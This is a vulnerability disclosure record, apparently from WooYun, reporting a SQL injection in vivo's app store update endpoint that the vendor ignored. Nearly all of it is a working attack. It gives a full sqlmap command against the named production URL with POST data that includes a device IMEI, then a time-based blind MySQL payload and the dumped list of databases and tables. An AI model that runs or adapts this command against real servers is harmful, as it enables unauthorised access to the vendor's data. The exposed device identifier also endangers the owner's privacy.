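2016-04-06: Details reported to the vendor; awaiting vendor handling
2016-04-11: The vendor actively ignored the vulnerability; details disclosed to the public
... Ignored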
python sqlmap.py -u "http://update.appstore.vivo.com.cn/port/packages_update/" --data "nt=WIFI&model=vivo+X5Max%2B&packages=com.tencent.mm%7C760%7C%2Ccom.vlife.vivo.wallpaper%7C559%7C%2Ccn.wps.moffice_eng%7C149%7C%2Cnet.openvpn.openvpn%7C74%7C%2Ccom.naver.linewebtoon%7C151101%7C%2Ccom.qiyi.video%7C88%7C%2Ccom.baidu.BaiduMap%7C740%7C%2Ccom.dmm.games.touken%7C32%7C%2Ccom.baidu.appsearch%7C16787600%7C%2Ccom.easyovpn.easyovpn%7C150827263%7C%2Ccom.tudou.android%7C65%7C%2Ccom.windfindtech.ishanghai%7C22%7C%2Ccom.tencent.mobileqq%7C348%7C%2Ccom.huati%7C20141238%7C%2Ccom.google.android.syncadapters.calendar%7C16%7C%2Ccom.sankuai.meituan%7C361%7C%2Ckvpioneer.safecenter%7C6%7C%2Ccom.taobao.taobao%7C131%7C%2Ccom.bbk.appstore%7C622%7C%2Ccom.vivo.game%7C38%7C%2Ccom.vivo.browser%7C4420%7C%2Ccom.android.browser%7C59999%7C%2Ccom.chaozh.iReader%7C431%7C%2Ccom.vivo.space%7C13%7C&density=3.0&screensize=1080_1920&imei=867404020999500&at=1459861062590&n=2&app_version=622&av=19&cs=0&u=-323977978&pictype=webp&elapsedtime=125452006&an=4.4.4&dbversion=0&s=2%7C4273816697"
---
Parameter: an (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: nt=WIFI&model=vivo X5Max+&packages=com.tencent.mm|760|,com.vlife.vivo.wallpaper|559|,cn.wps.moffice_eng|149|,net.openvpn.openvpn|74|,com.naver.linewebtoon|151101|,com.qiyi.video|88|,com.baidu.BaiduMap|740|,com.dmm.games.touken|32|,com.baidu.appsearch|16787600|,com.easyovpn.easyovpn|150827263|,com.tudou.android|65|,com.windfindtech.ishanghai|22|,com.tencent.mobileqq|348|,com.huati|20141238|,com.google.android.syncadapters.calendar|16|,com.sankuai.meituan|361|,kvpioneer.safecenter|6|,com.taobao.taobao|131|,com.bbk.appstore|622|,com.vivo.game|38|,com.vivo.browser|4420|,com.android.browser|59999|,com.chaozh.iReader|431|,com.vivo.space|13|&density=3.0&screensize=1080_1920&imei=867404020999500&at=1459861062590&n=2&app_version=622&av=19&cs=0&u=-323977978&pictype=webp&elapsedtime=125452006&an=4.4.4' AND (SELECT * FROM (SELECT(SLEEP(5)))ghSA) AND 'LGGj'='LGGj&dbversion=0&s=2|4273816697
---
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] appcontent
[*] information_schema
[*] test
Database: appcontent
[23 tables]
+-----------------------------+
| :ec_manual_catch_apk        |
| comment_tmp                 |
| t_ac_apk_url                |
| t_ac_app_info               |
| t_ac_app_info_all           |
| t_ac_app_info_hot           |
| t_ac_app_s                  |
| t_ac_app_screenshot         |
| t_ac_fail_catch_app         |
| t_ac_manual_update_apk      |
| t_ac_single_download        |
| t_ac_spider_detail_q        |
| t_ac_spider_detail_template |
| t_ac_spider_list_task       |
| t_ac_spider_list_template   |
| t_ac_wdj_icon               |
| t_activity_info             |
| t_ad_app                    |
| t_ad_click                  |
| t_ad_icon                   |
| t_ad_info                   |
| t_android_permission        |
| t_apk_delete                |
+-----------------------------+
Severity: No impact (ignored by vendor)
Ignored at: 2016-04-11 19:20
Vulnerability Rank: 15 (WooYun rating)
None yet